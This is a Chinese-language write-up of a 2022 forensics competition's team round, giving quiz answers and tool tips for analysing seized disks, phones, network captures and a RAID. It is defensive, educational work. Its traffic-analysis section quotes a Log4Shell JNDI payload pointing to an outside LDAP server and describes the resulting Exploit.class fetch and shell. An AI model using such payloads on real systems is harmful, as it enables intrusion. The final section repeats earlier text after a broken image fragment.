团体赛做了前前后后有一个多星期吧,难度比个人赛大多了,里面对硬件卷组的考察要求更高,raid重组,案件的分析也是综合性的,嫌疑人和受害人多方都是需要去分析的
参考链接:https://blog.csdn.net/WXjzcccc/article/details/128175094?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169892206716800225587790%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169892206716800225587790&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_click~default-4-128175094-null-null.142v96pc_search_result_base6&utm_term=2022%E7%BE%8E%E4%BA%9A%E6%9D%AF%E5%9B%A2%E4%BD%93%E8%B5%9B&spm=1018.2226.3001.4187
3000
找到之后导出倒放
3
sudo last
last
last命令的功能是用于显示用户历史登录情况,通过查看系统记录的日志文件内容,进而使管理员可以获知谁曾经或者试图连接过服务器。
登录时可以查看到用户
3
lastlog查看
12
ssh登录肯定得有ip地址,推测tty2是本地登录,这个我也不确定,但是看记录就是12
A. Iamhacker
B. hacking
C. Hack
D. Hacker
E. 以上皆非
C
这个是日志文件的备份
把btmp文件导入流媒体服务器查看 ,用last -f btmp
lastb 可以读取日志中登录尝试失败的账户信息
lastb -f btmp
建议去了解linux日志目录的规范
Li
这个用户应该是sammy
全局搜索sammy,检视文件,半蒙半猜
第九题翻数据库意外找到的
A. apache2
B. Ubuntu
C. Centos
D. Nginx
E. hello-world
F. 以上皆非
BCDE
火眼里面直接可以看到
docker images可以查看镜像列表
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
D
火眼直接查看
docker ps查看运行的容器信息
A. cn.wordpress.org
F. 以上皆非
BC
在火眼里进行数据库分析
有些内容,软件跑不出来,仿真进去看
这是wordpress的配置信息
进入wordpress,看表wp_comments,输入select * from wp_comments;
A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非
E
查看calendar日历工具
zpool status命令查看,显示ZFS文件系统
A.Jun
B.Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非
D
/media0/mediastorage下面检视一下就ok
root
直接ll -lh查看就好了
尝试检索无果
就去看别人的解析
对字段“儿童色情”进行url编码,全局检索
MEDIA0MEDIASTORAGEVERSION1
ZFS文件系统,可以使用 zfs list -t snapshot
命令来列出所有快照和它们的名称
30
zfs rollback media0/mediastorage@version1恢复到原来的快照
A. Pem
B. Cer
C. Crt
D. Key
E. 以上皆非
A
可以看到文本,很明显就是pem格式文件
A. Symmetric
B. PGP
C. Twofish
D. RSA
E. Triple DES
AD
从语法结构可以看出是python,第二张图是加密过程,仔细读,与选项对应
A. Exe
B. Ods
C. Rtf
D. Sql
E. 以上皆非
D
见下题
A. Armand To
B. Adam Smasher
C. Beverly Kot
D. Huma Chan
E. 以上皆非
这是我自己解密的脚本,确实还存在问题,rsa要以pkcs1读取文件,返回一个私钥,并以此解密,这是因为文件在加密的时候,以pkcs1转换了私钥,要做一步处理
而且这里在开始做的时候,文件也找错了,比赛的时候直接试试两个文件就好了,而且minecraft.exe也很奇怪,一个exe文件的预览怎么会是像base64呢,很奇怪的
脚本对比大佬脚本进行修正
不知道为啥我的还是有报错
A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非
A
使用过滤器查看,看到get
追踪http流
A. Root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password
B
过滤器过滤之后,追踪http流
URL解码
A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是
D
综合分析,虽然说LDAP一般端口是389,现在连接的是1389,不排除修改端口的可能性,post请求之后AGC服务器10.0.66.184确实对目标ip进行了TCP连接,应该是对的
搜索Exploit.class,发现找到了,还是一个get请求
先追踪118的TCP流,查看
很明显是一个linux交互的环节
这里用ftp下载文件,应该是发送同步要求
9001
FTP协议结束然后就用9001端口了
A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail
ACE
还是在上面的地方,追踪TCP流
A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案
DE
B选项是删掉了两个文档
新建两个txt
替文档改名
A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous
A
A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)
D
使用foremost工具分离
我的查看不到
A. a6eef1… …27364c
B. 54785c… …fe86f0
C. 961f2b… …647d55
D. a00e6c… …d0eaab
E. 以上皆非
E
A. 曾经采用他的计算机入侵AGC集团网络
B. 传播儿童色情物品
C. 于AGC集团取得大量客户资料
D. 通过VPN取得Rooney家里的IP地址
E. 企图更改AGC集团的网页
ACDE
儿童色情影片观看了,但没有传播
A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
一开始,不知道哪台是AGC-CS,看到设备名称才知道
火眼软件的很奇怪,这个镜像最后一次正常关机时间在系统安装时间前面
A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33
A
取证大师能看到
A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY
A. \192.168.182.134
B. \192.168.182.134\photo
C. \192.168.182.134\share
D. \192.168.182.134\AGC
E. \192.168.182.134\AGC photo
C
45
6717
KEFMUONDOCX
这个上面的链接
直接打开,失败了
查看这个文件
A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机
A
A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非
B
最早的成功登录的时间,最早的登录失败的时间,最早的修改密码的时间
20220929204102
30号下了一个putty
9061AEC09045
查看了AGC的电脑信息,发现没有
尝试看下接收端的文件
查看信息
320A98F6519748D16B8870EF4D8A606D656C5A09CF2F660AA35EBF6495824CB1
只能看到是这个文件,不知道如何从导出的文件中分离出来
仿真试了也不行
去黑客王景浩电脑看看
导出算sha356
A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC
teamviewer
这个raid重组,干了一晚上,第一次接触,确实有点难
A. root
B. VM_admin
C. sysadmin
D. aclE. tss
A. 38.242.130.207
B. 218.92.0.206
C. 43.142.93.22
D. 121.202.141.105
E. 61.238.217.108
A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0
B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1
C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1
D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1
E. Windows 10 Pro Outlook 2016
A. C89D7A… …8C4E76
B. C7141F… …64BF65
C. E9433E… …1A5134
D. 45CE1C… …79BD4A
E. 0ACAA5… …AB7ECE
A. 河背街
B. 沙咀道
C. 众安街
D. 香车街
E. 川龙街
A. exFAT
B. APFS
C. HFS
D. HFS+
D
A. 10.4.11
B. 10.9.5
C. 10.10.5
D. 10.11.6
D
6
BROTHER
9
搜索spotlight
这题有点懵
A. manifest.plist
B. info.plist
C. PasswordPanel.strings
D. kcpassword
D
查下目录规范
A. 1qa@WS3ed
B. 3ed$RF5tg
C. 5tg^YH7uj
D. 2ws$RF6yh
D
尝试四个密码
更快的解法
取证大师直接查
仿真进去看
A. 12.5.6
B. 15.4
C. 15.5
D. 16.0.3
AC
20221021181730
A. Info.plist
B. privacy.json
C. Manifest.plist
D. PasswordPanel.strings
C
苹果手机备份的密码(iTunes Backup Encryption Password)通常会记录在 Manifest.plist
档案中。
这个文件包含了有关备份的信息,包括是否启用了备份加密以及备份加密所使用的密码。
A. Passware
B. John The Ripper
C. HashCat
D. Password Recovery Toolkit
ABCD
A. WPKY
B. ITER
C. SALT
D. DPIC
E. DPSL
2022
自己写一个简单的四位数字典脚本
进行密码攻击
20221020162806
A. CE3_balljoint_extender.gcode
B. um3-penguin-real-mini-keychain-merged-tpu.gcode
C. CE3_Prancer.gcode
D. CE3_2020-psu-atx-mount.gcode
D
A. 百度
B. 谷歌
C. 360
D. Safari
A
仿真进去,随便打几个字就能看见
A. bc1quw… …zpzjzt
B. bc1qm… …5f7n9g
C. bc1q79… …h4sq52
D. bc1qsl… …je7hkk
A
在邮件附件里面翻到的
A. AGC2020@pw
B. AGC2012@PW
C. AGC2020@hkg
D. AGC2021@PW
A
看佬的答案是这个,我也推不出来为什么是这封邮件
我个人猜测是这两封,因为有银行卡号,第一封有账单文件,第二封可能性更大
A. Teamviewer
B. OpenVPN
C. Remote Desktop Manager
D. Tor Browser
A. ost
B. xlsx
C. jpg
D. docx
AB
teamviewer里面有
61238217108
搜索,VPN的日志文件,分析就好了
简单的日志分析
c81ee74af933
取证大师,系统和硬件这块的底层做的没话说
A. 2022年07月14日
B. 2022年07月15日
C. 2022年07月16日
D. 2022年07月17日
E. 2022年07月18日
A
和前面的题目联系起来了
A. HKD298.8
B. HKD344.7
C. HKD396
D. HKD543
E. HKD465.1
B
A. KEF
B. EDIFIER
C. BOSE
D. YAMAHA
E. Bowers & Wilkins
D
A. 大埔海滨
B. 启德
C. 数码港
D. 西环
E. 将军澳
D
百度查到的
不多说了,火眼软件的优势
A. 6分58秒
B. 8分10秒
C. 9分6秒
D. 11分1秒
E. 15分33秒
说到无人机,大疆的市场份额是碾压式的
搜索大疆英文dji
A. 拍摄时间
B. 经纬度
C. 时区
D. 档案名称
E. 拍摄装备
创建时间也就是拍摄时间被修改
经纬度被修改
他的信息前者来自图片exif信息(被修改的),后者来自手机的数据库信息(最初的),应该是的
2286249931134190938
接上题,数据库里的信息才是对的
A. OpenWrt
B. admin
C. root
D. AsusRt
E. DDwrt
A. LAN地址是 192.168.1.24
B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务
C. WIFI登录密码为’OpenWrt
D. 提供网络时间协议 (NTP) 服务
E. 时区设置相等于UTC+8
A. IP地址 61.238.217.108
B. IP地址 192.168.8.1
C. IP地址 103.10.12.106
D. 端口 33248E. 端口 1194
F. 端口 1701
和80题都在日志里
A. 1
B. 2
C. 3
D. 4
E. 0
A. 2
B. 4
C. 5
D. 6
E. 8
8004304896
A. 1
B. 2
C. 3
D. 4
E. 0
B
A. 07
B. AF
C. 0C
D. 2B
E. 01
A
用ftk挂载再用diskgenius搜索分区就ok
A. 目录项结构 (Directory Entry) 受损
B. 启动扇区表 (Master Boot Record) 受损
C. 文件分配表 (File Allocation Table - FAT) 受损
D. 引导扇区 (Boot Sector) 受损
E. 以上各项皆是
AB
这几个目录项结构都是USBC坏道
这两个乱码应该是启动扇区表
8
搜索USBC坏块就好了,55 53 42 43 F0
看大佬的是可以手工取证的,试了一下,原理大概明白了,但是确实挺麻烦的,恢复大师一把梭哈
A. 人
B. 山
C. 汽车
D. 交通灯
E. 天空
B
先利用x-ways恢复图片后缀导出
导出计算SHA256
软件不能导出一个什么csv或者excel文件,只能用笨办法了
再确认下
A. 61.238.217.108
B. 155.137.190.123
C. 192.168.1.66
D. 185.200.100.242
E. 213.104.156.111
D
从恢复大师中把相应时间段的文件导出之后,进行视频信息研判
A. E63DF0… …8627D3
B. 3FD99E… …17B6DE
C. 3BADAA… …666A8F
D. BBB211… …E00710
E. AA9E81… …2C04FE
A. MetaMask
B. Electrum
C. Trezor
D. 以上皆非
B
桌面就有快捷方式
BC1Q0R0L3LH63WY865CD560KN3UHJQRWGGVTY4ZJ8N
检查whatsapp看到的
A. 1%
B. 4%
C. 7%
D. 10%
E. 15%
D
A. oppose
B. area
C. twice
D. roast
D
有五个钱包
rc没有被加密
检视之后选D
A. 1
B. 2
C. 3
D. 4
E. 5
E
选择五个钱包一一查看,只有rc未加密
A. DMG
B. PDF
C. ASD
D. ZIP
E. PNG
C
检索后缀名
能看到就行
这是后面做题发现的,这个正则搜索就很灵性
A. Safepal
B. Metamask
C. Changelly
D. Opensea
C
在手机相册里面
A. 2022-10-07 10:29时
B. 2022-10-07 11:06时
C. 2022-10-07 11:07时
D. 2022-10-07 13:54时
A
看资金,应该是上面的
A. Chrome 2022-08-25 12:35时
B. Chrome 2022-10-07 14:29时
C. Firefox 2022-08-25 12:35时
D. Firefox 2022-10-07 14:29时
B
metamask是chrome里面的插件
C:\Users\langni001\AppData\Local\Google\Chrome\User Data\Default\Extensions
查这个chrome 的插件目录
A. Ethereum
B. Polygon
C. Solana
D. Arbitrum
E. Klaytn
A
A. 2022-10-07 14:47时
B. 2022-10-07 14:49时
C. 2022-10-07 14:52时
D. 2022-10-07 14:54时
A
搜索opensea之后可以看到
A. Metamask
B. Opensea
C. Safepal
D. YouTube
A. 登录 ‘Metamask’
B. 登录 ‘Opensea’
C. 屏幕截图 (Screen Capture)
D. 登录 ‘YouTube’
C
A. Opensea.io
B. Ethereum Main Network
C. Your purchase is complete
D. Subtotal = 0.0253 ETH
E. Good Luck
D
承上题
00247
直接登录就可以了
ROONEYCHAN19830801GMAILCOM
这个搜索很有灵性,搜索“@”
写题没思路的时候,就试试全局搜索或者索引搜索
KINGHOO0W0GMAILCOM
全局搜索
A. pdf
B. doc
C. png
D. txt
E. jpg
DE
导出来直接查看
两个txt文件加起来还没有压缩包大,说明有隐藏文件
使用binwalk能看到有张图片,不知道什么原因导致分离不出来
使用winrar修复压缩包试试
*each
查下种子的字典
teach或beach
teach计算种子正确
beach无效
teach hard goddess mask alcohol eyebrow illegal quit edit shaft pill tourist
根据metamask的货币类型,去选择好coin种类就好了
A. 你有推介吗?
B. 我之前放在你家的机械运作正常吗?
C. 有灯号 风扇有转动?
D. 帅吗?
C
A. 荃湾
B. 湾仔
C. 九龙城
D. 九龙塘
59814785
A. taiiphone
B. rooneyhome
C. Function Room
D. TP-Link
AC
A. abcd5678
B. aaaa0000
C. rooney111
D. rdfu1234
D
打开WiFi的配置文件去查选项就可以了
检材中有很多sda,sdb,我觉得可能就是网络磁盘
可以看下这篇文章去了解
https://blog.csdn.net/ck784101777/article/details/95460574?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169878893916800197024475%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169878893916800197024475&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-95460574-null-null.142v96pc_search_result_base6&utm_term=%E7%BD%91%E7%BB%9C%E7%A3%81%E7%9B%98&spm=1018.2226.3001.4187
mg-RQrbPcto-1698927159379)]
查下种子的字典
teach或beach
teach计算种子正确
beach无效
teach hard goddess mask alcohol eyebrow illegal quit edit shaft pill tourist
根据metamask的货币类型,去选择好coin种类就好了
A. 你有推介吗?
B. 我之前放在你家的机械运作正常吗?
C. 有灯号 风扇有转动?
D. 帅吗?
C
A. 荃湾
B. 湾仔
C. 九龙城
D. 九龙塘
59814785
A. taiiphone
B. rooneyhome
C. Function Room
D. TP-Link
AC
A. abcd5678
B. aaaa0000
C. rooney111
D. rdfu1234
D
打开WiFi的配置文件去查选项就可以了
检材中有很多sda,sdb,我觉得可能就是网络磁盘
可以看下这篇文章去了解
https://blog.csdn.net/ck784101777/article/details/95460574?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169878893916800197024475%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169878893916800197024475&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-95460574-null-null.142v96pc_search_result_base6&utm_term=%E7%BD%91%E7%BB%9C%E7%A3%81%E7%9B%98&spm=1018.2226.3001.4187